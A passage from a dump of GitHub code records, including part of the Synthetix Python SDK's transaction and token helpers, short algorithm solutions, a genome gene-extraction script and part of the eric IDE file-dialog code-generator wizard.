w3.from_wei(market[3], \"ether\"),\n \"price\": market[4],\n \"marketSize\": market[5],\n \"marketSkew\": market[6],\n \"marketDebt\": market[7],\n \"currentFundingRate\": market[8],\n \"currentFundingVelocity\": market[9],\n \"takerFee\": market[10][0],\n \"makerFee\": market[10][1],\n \"takerFeeDelayedOrder\": market[10][2],\n \"makerFeeDelayedOrder\": market[10][3],\n \"takerFeeOffchainDelayedOrder\": market[10][4],\n \"makerFeeOffchainDelayedOrder\": market[10][5],\n }\n for market in allmarketsdata\n }\n else:\n markets = {}\n\n # load sUSD legacy contract\n if \"sUSD\" in self.contracts:\n 
susd_legacy_definition = self.contracts[\"sUSD\"]\n susd_legacy_address = w3.to_checksum_address(\n susd_legacy_definition[\"address\"]\n )\n\n susd_legacy_token = w3.eth.contract(\n susd_legacy_address, abi=susd_legacy_definition[\"abi\"]\n )\n else:\n susd_legacy_token = None\n\n # load sUSD contract\n if \"USDProxy\" in self.contracts:\n susd_definition = self.contracts[\"USDProxy\"]\n susd_address = w3.to_checksum_address(susd_definition[\"address\"])\n\n susd_token = w3.eth.contract(susd_address, abi=susd_definition[\"abi\"])\n else:\n susd_token = None\n\n # load multicall contract\n if \"TrustedMulticallForwarder\" in self.contracts:\n mc_definition = self.contracts[\"TrustedMulticallForwarder\"]\n mc_address = w3.to_checksum_address(mc_definition[\"address\"])\n\n multicall = w3.eth.contract(mc_address, abi=mc_definition[\"abi\"])\n else:\n multicall = None\n\n return markets, susd_legacy_token, susd_token, multicall\n\n def _get_tx_params(self, value=0, to=None) -> TxParams:\n \"\"\"\n A helper function to prepare transaction parameters. This function\n will set up the transaction based on the parameters at initialization,\n but leave the ``data`` parameter empty.\n\n :param int value: value to send with transaction\n :param str | None to: address to send transaction to\n :return: A prepared transaction without the ``data`` parameter\n :rtype: TxParams\n \"\"\"\n params: TxParams = {\n \"from\": self.address,\n \"chainId\": self.network_id,\n \"value\": value,\n \"nonce\": self.nonce,\n }\n if to is not None:\n params[\"to\"] = to\n return params\n\n def wait(self, tx_hash: str, timeout: int = 120):\n \"\"\"\n Wait for a transaction to be confirmed and return the receipt.\n The function will throw an error if the timeout is exceeded.\n Use this as a helper function to wait for a transaction to be confirmed,\n then check the results and react accordingly.\n\n :param str tx_hash: transaction hash to wait for\n :param int timeout: timeout in seconds\n :return: A transaction receipt\n :rtype: dict\n \"\"\"\n receipt = self.web3.eth.wait_for_transaction_receipt(tx_hash, timeout=timeout)\n return receipt\n\n def execute_transaction(self, tx_data: dict):\n \"\"\"\n Execute a provided transaction. This function will be signed with the provided\n private key and submitted to the connected RPC. The ``Synthetix`` object tracks\n the nonce internally, and will handle estimating gas limits if they are not\n provided.\n\n :param dict tx_data: transaction data\n :return: A transaction hash\n :rtype: str\n \"\"\"\n if self.private_key is None:\n raise Exception(\"No private key specified.\")\n\n if \"gas\" not in tx_data:\n if self.use_estimate_gas:\n tx_data[\"gas\"] = int(self.web3.eth.estimate_gas(tx_data) * 1.2)\n else:\n tx_data[\"gas\"] = 1500000\n\n signed_txn = self.web3.eth.account.sign_transaction(\n tx_data, private_key=self.private_key\n )\n tx_token = self.web3.eth.send_raw_transaction(signed_txn.rawTransaction)\n\n # increase nonce\n self.nonce += 1\n\n return self.web3.to_hex(tx_token)\n\n def get_susd_balance(self, address: str = None, legacy: bool = False) -> dict:\n \"\"\"\n Gets current sUSD balance in wallet. 
Supports both legacy and V3 sUSD.\n\n :param str address: address to check balances for\n :param bool legacy: check legacy sUSD balance\n :return: A dictionary with the sUSD balance\n :rtype: dict\n \"\"\"\n # TODO: remove the dictionary return\n if not address:\n address = self.address\n\n token = self.susd_legacy_token if legacy else self.susd_token\n if token is None:\n return {\"balance\": 0}\n\n balance = token.functions.balanceOf(self.address).call()\n return {\"balance\": wei_to_ether(balance)}\n\n def get_eth_balance(self, address: str = None) -> dict:\n \"\"\"\n Gets current ETH and WETH balances at the specified address.\n\n :param str address: address to check balances for\n :return: A dictionary with the ETH and WETH balances\n :rtype: dict\n \"\"\"\n if not address:\n address = self.address\n\n weth_contract = self.web3.eth.contract(\n address=self.contracts[\"WETH\"][\"address\"], abi=self.contracts[\"WETH\"][\"abi\"]\n )\n\n eth_balance = self.web3.eth.get_balance(address)\n weth_balance = weth_contract.functions.balanceOf(address).call()\n\n return {\"eth\": wei_to_ether(eth_balance), \"weth\": wei_to_ether(weth_balance)}\n\n # transactions\n def approve(\n self,\n token_address: str,\n target_address: str,\n amount: float = None,\n submit: bool = False,\n ):\n \"\"\"\n Approve an address to spend a specified ERC20 token. This is a general\n implementation that can be used for any ERC20 token. Specify the amount\n as an ether value, otherwise it will default to the maximum amount::\n\n snx.approve(\n snx.susd_token.address,\n snx.perps.market_proxy.address,\n amount=1000\n )\n\n :param str token_address: address of the token to approve\n :param str target_address: address to approve to spend the token\n :param float amount: amount of the token to approve\n :param bool submit: submit the transaction\n :return: If ``submit``, returns a transaction hash. Otherwise, returns\n the transaction parameters.\n :rtype: str | dict\n \"\"\"\n # fix the amount\n amount = 2**256 - 1 if amount is None else ether_to_wei(amount)\n token_contract = self.web3.eth.contract(\n address=token_address, abi=self.contracts[\"USDProxy\"][\"abi\"]\n )\n\n tx_params = self._get_tx_params()\n tx_params = token_contract.functions.approve(\n target_address, amount\n ).build_transaction(tx_params)\n\n if submit:\n tx_hash = self.execute_transaction(tx_params)\n self.logger.info(\n f\"Approving {target_address} to spend {amount / 1e18} {token_address} for {self.address}\"\n )\n self.logger.info(f\"approve tx: {tx_hash}\")\n return tx_hash\n else:\n return tx_params\n\n def allowance(\n self, token_address: str, spender_address: str, owner_address: str = None\n ) -> float:\n \"\"\"\n Get the allowance for a target address to spend a specified ERC20 token for an owner.\n This is a general implementation that can be used for any ERC20 token.::\n\n snx.allowance(\n snx.susd_token.address,\n\n snx.perps.market_proxy.address\n )\n\n :param str token_address: address of the token to approve\n :param str spender_address: address to spender of the token\n :param str owner_address: address to token owner. 
If not specified, the default\n address is used.\n :return: The allowance for the target address to spend the token for the owner\n :rtype: float\n \"\"\"\n if not owner_address:\n owner_address = self.address\n\n token_contract = self.web3.eth.contract(\n address=token_address, abi=self.contracts[\"USDProxy\"][\"abi\"]\n )\n\n allowance = token_contract.functions.allowance(\n owner_address, spender_address\n ).call()\n\n return wei_to_ether(allowance)\n\n def wrap_eth(self, amount: float, submit: bool = False) -> str:\n \"\"\"\n Wraps or unwaps ETH to/from the WETH implementation stored in the constants file.\n Negative numbers will unwrap ETH, positive numbers will wrap ETH::\n\n snx.wrap_eth(1)\n snx.wrap_eth(-1)\n\n :param float amount: amount of ETH to wrap\n :param bool submit: submit the transaction\n :return: If ``submit``, returns a transaction hash. Otherwise, returns\n the transaction parameters.\n :rtype: str | dict\n \"\"\"\n value_wei = ether_to_wei(max(amount, 0))\n weth_contract = self.web3.eth.contract(\n address=self.contracts[\"WETH\"][\"address\"], abi=self.contracts[\"WETH\"][\"abi\"]\n )\n\n if amount < 0:\n fn_name = \"withdraw\"\n tx_args = [ether_to_wei(abs(amount))]\n else:\n fn_name = \"deposit\"\n tx_args = []\n\n tx_params = self._get_tx_params(value=value_wei)\n tx_params = weth_contract.functions[fn_name](*tx_args).build_transaction(\n tx_params\n )\n\n if submit:\n tx_hash = self.execute_transaction(tx_params)\n self.logger.info(f\"Wrapping {amount} ETH for {self.address}\")\n self.logger.info(f\"wrap_eth tx: {tx_hash}\")\n return tx_hash\n else:\n return tx_params\n","repo_name":"Synthetixio/python-sdk","sub_path":"src/synthetix/synthetix.py","file_name":"synthetix.py","file_ext":"py","file_size_in_byte":19270,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"44"} +{"seq_id":"9477013521","text":"# 딕셔너리로 저장하는 것은 시간초과 발생, 이것도 완전탐색이다.\n# 투 포인터를 활용하여 시간복잡도를 줄인다.\n# python3 로 채점하면 시간초과 발생.\nimport sys\n\nn = int(input())\nA, B, C, D = [0 for _ in range(n)], [0 for _ in range(n)], [0 for _ in range(n)], [0 for _ in range(n)]\n\nfor i in range(n):\n A[i], B[i], C[i], D[i] = map(int, sys.stdin.readline().split())\n\nAB, CD = [], []\nfor i in range(n):\n for j in range(n):\n AB.append(A[i] + B[j])\n CD.append(C[i] + D[j])\nAB.sort()\nCD.sort()\n\n# AB에 left 인덱스를 놓고, CD에 right 인덱스를 놓는다.\nleft, right = 0, len(CD) - 1\nanswer = 0\nwhile left < len(AB) and right >= 0:\n if AB[left] + CD[right] == 0: # 합이 0일 때\n nextL, nextR = left + 1, right - 1 # 같은 값을 찾아\n while nextL < len(AB) and AB[left] == AB[nextL]:\n nextL += 1\n while nextR >= 0 and CD[right] == CD[nextR]:\n nextR -= 1\n answer += (nextL - left) * (right - nextR) # 갯수만큼 결과 값에 더한다.\n left, right = nextL, nextR\n elif AB[left] + CD[right] > 0: # 합이 0보다 클 때\n right -= 1\n else: # 합이 0보다 작을 때\n left += 1\nprint(answer)","repo_name":"Challenge-Next-Level/Floyd-Warshall","sub_path":"gunkim/tony의문제집/TwoPointer/7453_합이0인네정수.py","file_name":"7453_합이0인네정수.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"8349309032","text":"class LongestBinarySubsequence:\n\n def longestSubsequence(self, s, k):\n\n b = 1\n value = 0\n\n n = len(s)\n answer = 0\n\n for i in range(n-1, -1, -1):\n if s[i] == '1':\n if value + b <= k:\n answer += 1\n value += b\n # b *= 2\n else:\n answer += 1\n\n b *= 2\n\n return answer\n\n\nif __name__ == \"__main__\":\n\n lbs = 
LongestBinarySubsequence()\n\n s = \"001010010\"\n k = 1\n\n print(lbs.longestSubsequence(s, k))\n","repo_name":"srikrishnakaashyap/Coding_Practice","sub_path":"LongestBinarySubsequence.py","file_name":"LongestBinarySubsequence.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12457614393","text":"from Bio import SeqIO, Seq\n\ndef overlap( s1, e1, s2, e2 ):\n\treturn max(0, min(e1, e2) - max(s1, s2) + 1)\n\ndef get_BA71V():\n\tfor rec in SeqIO.parse(open('data/U18466.2.fa'), 'fasta'):\n\t\tgenome = str(rec.seq)\n\n\twith open('data/BA71V_prot.fa', 'w') as f1:\n\t\twith open('data/BA71V_cds.fa', 'w') as f2:\n\t\t\tfor line in open('data/U18466.2.gff3'):\n\t\t\t\ttab = line.split('\\t')\n\t\t\t\tif not 'id' in tab[3]:\n\t\t\t\t\tstart, end, strand, descr = int(tab[1]), int(tab[2]), tab[5], tab[-1].strip()\n\t\t\t\t\tname = tab[3]\n\t\t\t\t\tseq = genome[start-1:end]\n\t\t\t\t\tif strand == '-':\n\t\t\t\t\t\tseq = Seq.reverse_complement(seq)\n\t\t\t\t\tif len(seq)%3!=0 or (seq[-1]!='*' and seq[:3]!='ATG'):\n\t\t\t\t\t\tprint(name, seq)\n\t\t\t\t\telse:\n\t\t\t\t\t\tprot = Seq.translate(seq).strip('*')\n\t\t\t\t\t\tprint('>'+name, prot, sep='\\n', file=f1)\n\t\t\t\t\tprint('>'+name, seq, sep='\\n', file=f2)\n\n\nif __name__ == '__main__':\n\tget_BA71V()","repo_name":"surykartka/circosBlastSimilarities","sub_path":"genome_comparison/get_genes.py","file_name":"get_genes.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32762570982","text":"import os\n\nfrom PyQt5.QtCore import pyqtSlot, QUrl\nfrom PyQt5.QtWidgets import (\n QDialog, QDialogButtonBox, QFileDialog, QButtonGroup\n)\n\nfrom E5Gui.E5Completers import E5FileCompleter, E5DirCompleter\n\nfrom .Ui_FileDialogWizardDialog import Ui_FileDialogWizardDialog\n\nimport Globals\n\n\nclass FileDialogWizardDialog(QDialog, Ui_FileDialogWizardDialog):\n \"\"\"\n Class implementing the color dialog wizard dialog.\n \n It displays a dialog for entering the parameters for the\n E5FileDialog or QFileDialog code generator.\n \"\"\"\n def __init__(self, dialogVariant, parent=None):\n \"\"\"\n Constructor\n \n @param dialogVariant variant of the file dialog to be generated\n (-1 = E5FileDialog, 0 = unknown, 5 = PyQt5)\n @type int\n @param parent parent widget\n @type QWidget\n \"\"\"\n super(FileDialogWizardDialog, self).__init__(parent)\n self.setupUi(self)\n \n self.eStartWithCompleter = E5FileCompleter(self.eStartWith)\n self.eWorkDirCompleter = E5DirCompleter(self.eWorkDir)\n \n self.__typeButtonsGroup = QButtonGroup(self)\n self.__typeButtonsGroup.setExclusive(True)\n self.__typeButtonsGroup.addButton(self.rOpenFile, 1)\n self.__typeButtonsGroup.addButton(self.rOpenFiles, 2)\n self.__typeButtonsGroup.addButton(self.rSaveFile, 3)\n self.__typeButtonsGroup.addButton(self.rfOpenFile, 11)\n self.__typeButtonsGroup.addButton(self.rfOpenFiles, 12)\n self.__typeButtonsGroup.addButton(self.rfSaveFile, 13)\n self.__typeButtonsGroup.addButton(self.rOpenFileUrl, 21)\n self.__typeButtonsGroup.addButton(self.rOpenFileUrls, 22)\n self.__typeButtonsGroup.addButton(self.rSaveFileUrl, 23)\n self.__typeButtonsGroup.addButton(self.rDirectory, 30)\n self.__typeButtonsGroup.addButton(self.rDirectoryUrl, 31)\n self.__typeButtonsGroup.buttonClicked[int].connect(\n self.__toggleInitialFilterAndResult)\n self.__toggleInitialFilterAndResult(1)\n \n self.__dialogVariant = 
dialogVariant\n if self.__dialogVariant == -1:\n self.pyqtComboBox.addItems([\"eric\"])\n self.setWindowTitle(self.tr(\"E5FileDialog Wizard\"))\n self.pyqtComboBox.setCurrentIndex(0)\n self.pyqtComboBox.setEnabled(False)\n else:\n self.pyqtComboBox.addItems([\"PyQt5\", \"PyQt6\"])\n self.setWindowTitle(self.tr(\"QFileDialog Wizard\"))\n if self.__dialogVariant == 5:\n self.pyqtComboBox.setCurrentIndex(0)\n elif self.__dialogVariant == 6:\n self.pyqtComboBox.setCurrentIndex(1)\n else:\n self.pyqtComboBox.setCurrentIndex(0)\n \n self.rSaveFile.toggled[bool].connect(self.__toggleConfirmCheckBox)\n self.rfSaveFile.toggled[bool].connect(self.__toggleConfirmCheckBox)\n self.rSaveFileUrl.toggled[bool].connect(self.__toggleConfirmCheckBox)\n self.rDirectory.toggled[bool].connect(self.__toggleGroupsAndTest)\n self.rDirectoryUrl.toggled[bool].connect(self.__toggleGroupsAndTest)\n self.cStartWith.toggled[bool].connect(self.__toggleGroupsAndTest)\n self.cWorkDir.toggled[bool].connect(self.__toggleGroupsAndTest)\n self.cFilters.toggled[bool].connect(self.__toggleGroupsAndTest)\n \n self.bTest = self.buttonBox.addButton(\n self.tr(\"Test\"), QDialogButtonBox.ButtonRole.ActionRole)\n \n msh = self.minimumSizeHint()\n self.resize(max(self.width(), msh.width()), msh.height())\n \n def __adjustOptions(self, options):\n \"\"\"\n Private method to adjust the file dialog options.\n \n @param options file dialog options (QFileDialog.Options)\n @return modified options (QFileDialog.Options)\n \"\"\"\n if Globals.isLinuxPlatform():\n options |= QFileDialog.Option.DontUseNativeDialog\n return options\n \n @pyqtSlot(int)\n def on_pyqtComboBox_currentIndexChanged(self, index):\n \"\"\"\n Private slot to setup the dialog for the selected PyQt variant.\n \n @param index index of the current item\n @type int\n \"\"\"\n txt = self.pyqtComboBox.itemText(index)\n self.rfOpenFile.setEnabled(txt == \"eric\")\n self.rfOpenFiles.setEnabled(txt == \"eric\")\n self.rfSaveFile.setEnabled(txt == \"eric\")\n \n self.rOpenFileUrl.setEnabled(txt in [\"PyQt5\", \"PyQt6\"])\n self.rOpenFileUrls.setEnabled(txt in [\"PyQt5\", \"PyQt6\"])\n self.rSaveFileUrl.setEnabled(txt in [\"PyQt5\", \"PyQt6\"])\n self.rDirectoryUrl.setEnabled(txt in [\"PyQt5\", \"PyQt6\"])\n \n if txt in [\"PyQt5\", \"PyQt6\"]:\n if self.rfOpenFile.isChecked():\n self.rOpenFile.setChecked(True)\n elif self.rfOpenFiles.isChecked():\n self.rOpenFiles.setChecked(True)\n elif self.rfSaveFile.isChecked():\n self.rSaveFile.setChecked(True)\n else:\n if self.rOpenFileUrl.isChecked():\n self.rOpenFile.setChecked(True)\n if self.rOpenFileUrls.isChecked():\n self.rOpenFiles.setChecked(True)\n if self.rSaveFileUrl.isChecked():\n self.rSaveFile.setChecked(True)\n if self.rDirectoryUrl.isChecked():\n self.rDirectory.setChecked(True)\n \n if txt == \"eric\":\n self.__dialogVariant = -1\n elif txt == \"PyQt5\":\n self.__dialogVariant = 5\n elif txt == \"PyQt6\":\n self.__dialogVariant = 6\n else:\n # default is PyQt5\n self.__dialogVariant = 5\n \n self.__toggleInitialFilterAndResult(\n self.__typeButtonsGroup.checkedId())\n \n def on_buttonBox_clicked(self, button):\n \"\"\"\n Private slot called by a button of the button box clicked.\n \n @param button button that was clicked (QAbstractButton)\n \"\"\"\n if button == self.bTest:\n self.on_bTest_clicked()\n \n @pyqtSlot()\n def on_bTest_clicked(self):\n \"\"\"\n Private method to test the selected options.\n \"\"\"\n if self.rOpenFile.isChecked() or self.rfOpenFile.isChecked():\n if not self.cSymlinks.isChecked():\n options = 
QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n QFileDialog.getOpenFileName(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options)\n elif self.rOpenFileUrl.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n try:\n QFileDialog.getOpenFileUrl(\n None,\n self.eCaption.text(),\n QUrl(self.eStartWith.text()),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n except TypeError:\n # PyQt5 < 5.13.0 contains an error\n QFileDialog.getOpenFileUrl(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n elif self.rOpenFiles.isChecked() or self.rfOpenFiles.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n QFileDialog.getOpenFileNames(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options)\n elif self.rOpenFileUrls.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n try:\n QFileDialog.getOpenFileUrls(\n None,\n self.eCaption.text(),\n QUrl(self.eStartWith.text()),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n except TypeError:\n # PyQt5 < 5.13.0 contains an error\n QFileDialog.getOpenFileUrls(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n elif self.rSaveFile.isChecked() or self.rfSaveFile.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n QFileDialog.getSaveFileName(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options)\n elif self.rSaveFileUrl.isChecked():\n if not self.cSymlinks.isChecked():\n options = QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n else:\n options = QFileDialog.Options()\n options = self.__adjustOptions(options)\n try:\n QFileDialog.getSaveFileUrl(\n None,\n self.eCaption.text(),\n QUrl(self.eStartWith.text()),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n except TypeError:\n # PyQt5 < 5.13.0 contains an error\n QFileDialog.getSaveFileUrl(\n None,\n self.eCaption.text(),\n self.eStartWith.text(),\n self.eFilters.text(),\n self.eInitialFilter.text(),\n options,\n self.schemesEdit.text().split())\n elif self.rDirectory.isChecked():\n options = QFileDialog.Options()\n if not self.cSymlinks.isChecked():\n options |= QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n if self.cDirOnly.isChecked():\n options |= QFileDialog.Options(QFileDialog.Option.ShowDirsOnly)\n else:\n options |= QFileDialog.Options(QFileDialog.Option(0))\n options = 
self.__adjustOptions(options)\n QFileDialog.getExistingDirectory(\n None,\n self.eCaption.text(),\n self.eWorkDir.text(),\n options)\n elif self.rDirectoryUrl.isChecked():\n options = QFileDialog.Options()\n if not self.cSymlinks.isChecked():\n options |= QFileDialog.Options(\n QFileDialog.Option.DontResolveSymlinks)\n if self.cDirOnly.isChecked():\n options |= QFileDialog.Options(QFileDialog.Option.ShowDirsOnly)\n else:\n options |= QFileDialog.Options(QFileDialog.Option(0))\n options = self.__adjustOptions(options)\n try:\n QFileDialog.getExistingDirectoryUrl(\n None,\n self.eCaption.text(),\n QUrl(self.eWorkDir.text()),\n options,\n self.schemesEdit.text().split())\n except TypeError:\n # PyQt5 < 5.13.0 contains an error\n QFileDialog.getExistingDirectoryUrl(\n None,\n self.eCaption.text(),\n self.eWorkDir.text(),\n options,\n self.schemesEdit.text().split())\n \n def __toggleConfirmCheckBox(self):\n \"\"\"\n Private slot to enable/disable the confirmation check box.\n \"\"\"\n self.cConfirmOverwrite.setEnabled(\n self.rSaveFile.isChecked() or self.rfSaveFile.isChecked() or\n self.rSaveFileUrl.isChecked())\n \n def __toggleGroupsAndTest(self):\n \"\"\"\n Private slot to enable/disable certain groups and the test button.\n \"\"\"\n if self.rDirectory.isChecked() or self.rDirectoryUrl.isChecked():\n self.filePropertiesGroup.setEnabled(False)\n self.dirPropertiesGroup.setEnabled(True)\n self.bTest.setDisabled(self.cWorkDir.isChecked())\n else:\n self.filePropertiesGroup.setEnabled(True)\n self.dirPropertiesGroup.setEnabled(False)\n self.bTest.setDisabled(\n self.cStartWith.isChecked() or self.cFilters.isChecked())\n \n def __toggleInitialFilterAndResult(self, checkedId):\n \"\"\"\n Private slot to enable/disable the initial filter elements and the\n results entries.\n \n @param checkedId id of the clicked button (integer)\n \"\"\"\n enable = (\n (self.__dialogVariant in (-1, ) and checkedId in [11, 12, 13]) or\n (self.__dialogVariant in (5, 6) and\n checkedId in [1, 2, 3, 21, 22, 23])\n )\n \n self.lInitialFilter.setEnabled(enable)\n self.eInitialFilter.setEnabled(enable)\n self.cInitialFilter.setEnabled(enable)\n \n self.lFilterVariable.setEnabled(enable)\n self.eFilterVariable.setEnabled(enable)\n \n self.urlPropertiesGroup.setEnabled(checkedId in (21, 22, 23, 31))\n \n def getCode(self, indLevel, indString):\n \"\"\"\n Public method to get the source code for Qt5.\n \n @param indLevel indentation level (int)\n @param indString string used for indentation (space or tab) (string)\n @return generated code (string)\n \"\"\"\n # calculate our indentation level and the indentation string\n il = indLevel + 1\n istring = il * indString\n estring = os.linesep + indLevel * indString\n \n # now generate the code\n if self.parentSelf.isChecked():\n parent = \"self\"\n elif self.parentNone.isChecked():\n parent = \"None\"\n elif self.parentOther.isChecked():\n parent = self.parentEdit.text()\n if parent == \"\":\n parent = \"None\"\n \n # prepare the result variables\n nameVariable = self.eNameVariable.text()\n if not nameVariable:\n if self.__typeButtonsGroup.checkedButton() in [\n self.rOpenFile, self.rfOpenFile,\n self.rSaveFile, self.rfSaveFile]:\n nameVariable = \"fileName\"\n elif self.__typeButtonsGroup.checkedButton() in [\n self.rOpenFiles, self.rfOpenFiles]:\n nameVariable = \"fileNames\"\n elif self.__typeButtonsGroup.checkedButton() == self.rDirectory:\n nameVariable = \"dirName\"\n else:\n nameVariable = \"res\"\n filterVariable = self.eFilterVariable.text()\n if not filterVariable:\n 
if (\n (self.__dialogVariant in (-1, ) and\n self.__typeButtonsGroup.checkedButton() in [\n self.rfOpenFile, self.rfOpenFiles, self.rfSaveFile]) or\n (self.__dialogVariant in (5, 6) and\n self.__typeButtonsGroup.checkedButton() in [\n self.rOpenFile, self.rOpenFiles, self.rSaveFile])\n ):\n filterVariable = \", selectedFilter\"\n else:\n filterVariable = \"\"\n else:\n filterVariable = \", \" + filterVariable\n \n if self.__dialogVariant == -1:\n dialogType = \"E5FileDialog\"\n optionStr = \"\"\n else:\n dialogType = \"QFileDialog\"\n optionStr = \".Option\"\n \n code = '{0}{1} = {2}.'.format(nameVariable, filterVariable, dialogType)\n if (\n self.rOpenFile.isChecked() or\n self.rfOpenFile.isChecked() or\n self.rOpenFileUrl.isChecked()\n ):\n if self.rOpenFile.isChecked():\n code += 'getOpenFileName({0}{1}'.format(os.linesep, istring)\n elif self.rOpenFileUrl.isChecked():\n code += 'getOpenFileUrl({0}{1}'.format(os.linesep, istring)\n else:\n code += 'getOpenFileNameAndFilter({0}{1}'.format(\n os.linesep, istring)\n code += '{0},{1}{2}'.format(parent, os.linesep, istring)\n if not self.eCaption.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n code += 'self.tr(\"{0}\"),{1}{2}'.format(\n self.eCaption.text(), os.linesep, istring)\n if self.rOpenFileUrl.isChecked():\n if not self.eStartWith.text():\n code += 'QUrl(),{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = 'QUrl(\"{0}\"),{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n else:\n if not self.eStartWith.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = '\"{0}\",{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n if self.eFilters.text() == \"\":\n code += '\"\"'\n else:\n if self.cFilters.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n code += fmt.format(self.eFilters.text())\n if self.rfOpenFile.isChecked() or self.__dialogVariant in (5, 6):\n if self.eInitialFilter.text() == \"\":\n initialFilter = \"None\"\n else:\n if self.cInitialFilter.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n initialFilter = fmt.format(self.eInitialFilter.text())\n code += ',{0}{1}{2}'.format(os.linesep, istring, initialFilter)\n if not self.cSymlinks.isChecked():\n code += (\n ',{0}{1}{2}.Options({2}{3}.DontResolveSymlinks)'\n .format(os.linesep, istring, dialogType, optionStr)\n )\n if self.rOpenFileUrl.isChecked() and bool(self.schemesEdit.text()):\n code += ',{0}{1}{2}'.format(\n os.linesep, istring, self.__prepareSchemesList())\n code += '){0}'.format(estring)\n elif (\n self.rOpenFiles.isChecked() or\n self.rfOpenFiles.isChecked() or\n self.rOpenFileUrls.isChecked()\n ):\n if self.rOpenFiles.isChecked():\n code += 'getOpenFileNames({0}{1}'.format(os.linesep, istring)\n elif self.rOpenFileUrls.isChecked():\n code += 'getOpenFileUrls({0}{1}'.format(os.linesep, istring)\n else:\n code += 'getOpenFileNamesAndFilter({0}{1}'.format(\n os.linesep, istring)\n code += '{0},{1}{2}'.format(parent, os.linesep, istring)\n if not self.eCaption.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n code += 'self.tr(\"{0}\"),{1}{2}'.format(\n self.eCaption.text(), os.linesep, istring)\n if self.rOpenFileUrls.isChecked():\n if not self.eStartWith.text():\n code += 'QUrl(),{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = 
'QUrl(\"{0}\"),{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n else:\n if not self.eStartWith.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n if self.cStartWith.isChecked():\n fmt = '{0},{1}{2}'\n else:\n fmt = '\"{0}\",{1}{2}'\n code += fmt.format(self.eStartWith.text(), os.linesep,\n istring)\n if not self.eFilters.text():\n code += '\"\"'\n else:\n if self.cFilters.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n code += fmt.format(self.eFilters.text())\n if self.rfOpenFiles.isChecked() or self.__dialogVariant in (5, 6):\n if self.eInitialFilter.text() == \"\":\n initialFilter = \"None\"\n else:\n if self.cInitialFilter.isChecked():\n fmt = '{0}'\n else:\n fmt = 'self.tr(\"{0}\")'\n initialFilter = fmt.format(self.eInitialFilter.text())\n code += ',{0}{1}{2}'.format(os.linesep, istring, initialFilter)\n if not self.cSymlinks.isChecked():\n code += (\n ',{0}{1}{2}.Options({2}{3}.DontResolveSymlinks)'\n .format(os.linesep, istring, dialogType, optionStr)\n )\n if (\n self.rOpenFileUrls.isChecked() and\n bool(self.schemesEdit.text())\n ):\n code += ',{0}{1}{2}'.format(\n os.linesep, istring, self.__prepareSchemesList())\n code += '){0}'.format(estring)\n elif (\n self.rSaveFile.isChecked() or\n self.rfSaveFile.isChecked() or\n self.rSaveFileUrl.isChecked()\n ):\n if self.rSaveFile.isChecked():\n code += 'getSaveFileName({0}{1}'.format(os.linesep, istring)\n elif self.rSaveFileUrl.isChecked():\n code += 'getSaveFileUrl({0}{1}'.format(os.linesep, istring)\n else:\n code += 'getSaveFileNameAndFilter({0}{1}'.format(\n os.linesep, istring)\n code += '{0},{1}{2}'.format(parent, os.linesep, istring)\n if not self.eCaption.text():\n code += '\"\",{0}{1}'.format(os.linesep, istring)\n else:\n code += 